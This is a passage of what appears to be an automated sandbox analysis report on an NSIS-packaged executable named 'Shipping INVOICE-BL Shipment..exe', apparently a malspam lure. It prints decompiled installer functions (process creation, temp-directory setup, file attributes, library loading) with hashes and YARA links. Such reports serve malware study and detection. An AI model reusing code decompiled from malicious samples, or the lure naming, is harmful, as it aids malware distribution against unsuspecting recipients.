                                                                                                                                    0x0040160a
                                                                                                                                    0x0040161a
                                                                                                                                    0x0040161d
                                                                                                                                    0x0040161f
                                                                                                                                    0x00401620
                                                                                                                                    0x004015d0
                                                                                                                                    0x00401627
                                                                                                                                    0x00401652
                                                                                                                                    0x004022a4
                                                                                                                                    0x00401629
                                                                                                                                    0x0040162b
                                                                                                                                    0x00401636
                                                                                                                                    0x0040163c
                                                                                                                                    0x00401644
                                                                                                                                    0x0040164a
                                                                                                                                    0x0040164a
                                                                                                                                    0x00401644
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(?,?,0042BCA0,?,00405C03,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560,00000000), ref: 00405BA5
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BAA
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BBE
                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                      • Part of subcall function 00405753: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405796
                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                    • API String ID: 1892508949-47812868
                                                                                                                                    • Opcode ID: 8acca499171d81bb2f3419eb941c7a60e200e9b6c8983b01d4d8df19a581cb41
                                                                                                                                    • Instruction ID: 535c21b7702f059b1d7074ae51545e7eff56296ea4168573509253bf270d0845
                                                                                                                                    • Opcode Fuzzy Hash: 8acca499171d81bb2f3419eb941c7a60e200e9b6c8983b01d4d8df19a581cb41
                                                                                                                                    • Instruction Fuzzy Hash: 26112331508140EBCB213FB55D419BF36B0AE96324F68453FE4D2B32E2D63C4942AA3E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405805, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405805(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0a0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                    0x0040580e
                                                                                                                                    0x0040582e
                                                                                                                                    0x00405836
                                                                                                                                    0x0040583b
                                                                                                                                    0x00000000
                                                                                                                                    0x00405841
                                                                                                                                    0x00405845

                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0A0,Error launching installer), ref: 0040582E
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040583B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405818
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: 421f809f28bca1f98b20e550836f3007b7b9bd60f9fc0af0ac10e5b082a614fb
                                                                                                                                    • Instruction ID: ef60985b0a8e60c0cc21645a7d93756c68bcebacb0ea3173ad9c7233b8f40f6f
                                                                                                                                    • Opcode Fuzzy Hash: 421f809f28bca1f98b20e550836f3007b7b9bd60f9fc0af0ac10e5b082a614fb
                                                                                                                                    • Instruction Fuzzy Hash: 8EE09AB5600209BFEB109BA4ED45F7B76ADEB04608F404425BD11E6151D77498158A78
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406573, Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406573(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E0040653A(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                                                                                                    0x00406584
                                                                                                                                    0x0040659b
                                                                                                                                    0x0040658f
                                                                                                                                    0x00406599
                                                                                                                                    0x00406599
                                                                                                                                    0x004065a6
                                                                                                                                    0x004065b2

                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406584
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406599
                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 004065A6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2567322000-0
                                                                                                                                    • Opcode ID: 8b3662556466c7a9aa9287d1dd3e0430d3586ccd5a047112670a1d7cd9fe4626
                                                                                                                                    • Instruction ID: 9a6e2dc2ccd47f310a317adcf38ee21a53a295a8560cc61b0a390025f0c3ae06
                                                                                                                                    • Opcode Fuzzy Hash: 8b3662556466c7a9aa9287d1dd3e0430d3586ccd5a047112670a1d7cd9fe4626
                                                                                                                                    • Instruction Fuzzy Hash: 16E0D831600118FBDB009F44ED01E9E7B6EEB44754F118037FA06B61D1D7B19E21DBA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403891, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00403891() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004038EE();
				return E0040592E(_t11, 0x436800, 7);
			}






                                                                                                                                    0x00403891
                                                                                                                                    0x004038a0
                                                                                                                                    0x004038a3
                                                                                                                                    0x004038a5
                                                                                                                                    0x004038a5
                                                                                                                                    0x004038ac
                                                                                                                                    0x004038b4
                                                                                                                                    0x004038b7
                                                                                                                                    0x004038b9
                                                                                                                                    0x004038b9
                                                                                                                                    0x004038b9
                                                                                                                                    0x004038c0
                                                                                                                                    0x004038d2

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038A3
                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038B7
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403896
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2962429428-3081826266
                                                                                                                                    • Opcode ID: f4883823afded9b7982d5ce8aa361b7af30e4f5c6102247c0ba02c17078a5cb8
                                                                                                                                    • Instruction ID: e2e60a7fa285321dbf32492e456ea5b7930b3da47de0ecd5afd05a55b0c9860b
                                                                                                                                    • Opcode Fuzzy Hash: f4883823afded9b7982d5ce8aa361b7af30e4f5c6102247c0ba02c17078a5cb8
                                                                                                                                    • Instruction Fuzzy Hash: AAE04F3140071496C5247F78AE495853A595B413317208776B034F20F0C63899565AAD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405BEC, Relevance: 3.0, APIs: 2, Instructions: 46stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E00405BEC(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406166(0x42bca0, _a4);
				_t21 = E00405B97(0x42bca0);
				if(_t21 != 0) {
					E004063D0(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bca0;
						while(1) {
							_t11 = lstrlenA(0x42bca0);
							_push(0x42bca0);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406469();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B45(0x42bca0);
								continue;
							} else {
								goto L1;
							}
						}
						E00405AFE();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                                                    0x00405bf8
                                                                                                                                    0x00405c03
                                                                                                                                    0x00405c07
                                                                                                                                    0x00405c0e
                                                                                                                                    0x00405c1a
                                                                                                                                    0x00405c26
                                                                                                                                    0x00405c26
                                                                                                                                    0x00405c3e
                                                                                                                                    0x00405c3f
                                                                                                                                    0x00405c46
                                                                                                                                    0x00405c47
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405c2a
                                                                                                                                    0x00405c31
                                                                                                                                    0x00405c39
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405c31
                                                                                                                                    0x00405c49
                                                                                                                                    0x00405c4f
                                                                                                                                    0x00000000
                                                                                                                                    0x00405c5d
                                                                                                                                    0x00405c1c
                                                                                                                                    0x00405c20
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405c20
                                                                                                                                    0x00405c09
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406166: lstrcpynA.KERNEL32(?,?,00000400,0040347B,Unbound Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00406173
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(?,?,0042BCA0,?,00405C03,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560,00000000), ref: 00405BA5
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BAA
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BBE
                                                                                                                                    • lstrlenA.KERNEL32(0042BCA0,00000000,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560,00000000), ref: 00405C3F
                                                                                                                                    • GetFileAttributesA.KERNELBASE(0042BCA0,0042BCA0,0042BCA0,0042BCA0,0042BCA0,0042BCA0,00000000,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560), ref: 00405C4F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3248276644-0
                                                                                                                                    • Opcode ID: 12d052b06ecefcd6606f27144e7bbfa3c3d14b32aee028dc0343ede84df2c329
                                                                                                                                    • Instruction ID: 2a59b109aead3482dcfafb4db46a255f05312d8e2ec5276b7002a83cdbe31f2e
                                                                                                                                    • Opcode Fuzzy Hash: 12d052b06ecefcd6606f27144e7bbfa3c3d14b32aee028dc0343ede84df2c329
                                                                                                                                    • Instruction Fuzzy Hash: 1DF0F435108F6516E232223A1D05A9F1A54CE43364706053FF851B22D3EB3C88429EBE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
					}
				}
				return 0;
			}










                                                                                                                                    0x0040138a
                                                                                                                                    0x004013fa
                                                                                                                                    0x0040139b
                                                                                                                                    0x004013a0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004013a2
                                                                                                                                    0x004013a3
                                                                                                                                    0x004013ad
                                                                                                                                    0x00000000
                                                                                                                                    0x00401404
                                                                                                                                    0x004013b0
                                                                                                                                    0x004013b7
                                                                                                                                    0x004013bd
                                                                                                                                    0x004013be
                                                                                                                                    0x004013c0
                                                                                                                                    0x004013c2
                                                                                                                                    0x004013b9
                                                                                                                                    0x004013b9
                                                                                                                                    0x004013ba
                                                                                                                                    0x004013ba
                                                                                                                                    0x004013c9
                                                                                                                                    0x004013cb
                                                                                                                                    0x004013f4
                                                                                                                                    0x004013f4
                                                                                                                                    0x004013c9
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 4caf53cf22bbe872b770c3f3fbbc44c84797692dd5fc93fbf8fc3fb0002ab025
                                                                                                                                    • Instruction ID: 7cdeea9b0131a57a15ac7f6c1e434deeaa3b569f473f58ba5ecd54f98bc9db7f
                                                                                                                                    • Opcode Fuzzy Hash: 4caf53cf22bbe872b770c3f3fbbc44c84797692dd5fc93fbf8fc3fb0002ab025
                                                                                                                                    • Instruction Fuzzy Hash: 1801F4317202209BE7195B79DD08B6A3698E710718F50823FF851F61F1DA78DC038B4D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004064FE, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004064FE(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E00406490(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                    0x00406506
                                                                                                                                    0x00406509
                                                                                                                                    0x00406510
                                                                                                                                    0x00406518
                                                                                                                                    0x00406524
                                                                                                                                    0x00000000
                                                                                                                                    0x0040652b
                                                                                                                                    0x0040651b
                                                                                                                                    0x00406522
                                                                                                                                    0x00000000
                                                                                                                                    0x00406533
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,0040341C,0000000A), ref: 00406510
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040652B
                                                                                                                                      • Part of subcall function 00406490: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A7
                                                                                                                                      • Part of subcall function 00406490: wsprintfA.USER32 ref: 004064E0
                                                                                                                                      • Part of subcall function 00406490: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
                                                                                                                                    • Instruction ID: 458cda3b533da5e0d65103126bb9241e04dc97badc687d1fb794b71832f36866
                                                                                                                                    • Opcode Fuzzy Hash: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
                                                                                                                                    • Instruction Fuzzy Hash: A0E0863260421066D6106774BD0482763E89FC5B00302443EF546F2144E7389C31966D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405CFF, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E00405CFF(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                    0x00405d03
                                                                                                                                    0x00405d10
                                                                                                                                    0x00405d25
                                                                                                                                    0x00405d2b

                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405D03
                                                                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D25
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                                                    • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                                                                                                                                    • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                                                    • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405CDA, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405CDA(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                                    0x00405cdf
                                                                                                                                    0x00405ce5
                                                                                                                                    0x00405cea
                                                                                                                                    0x00405cf3
                                                                                                                                    0x00405cf3
                                                                                                                                    0x00405cfc

                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,004058F2,?,?,00000000,00405AD5,?,?,?,?), ref: 00405CDF
                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405CF3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                                                                                    • Instruction ID: 9949a295f96e8328a39f1aa706882c5bfe6c67e515388db15e08be4317e2d048
                                                                                                                                    • Opcode Fuzzy Hash: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                                                                                    • Instruction Fuzzy Hash: 14D02232004030AFC2002728EF0C88BBF51DB40370702CB35FEA5A22F0CB310C129A98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004057D0, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004057D0(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
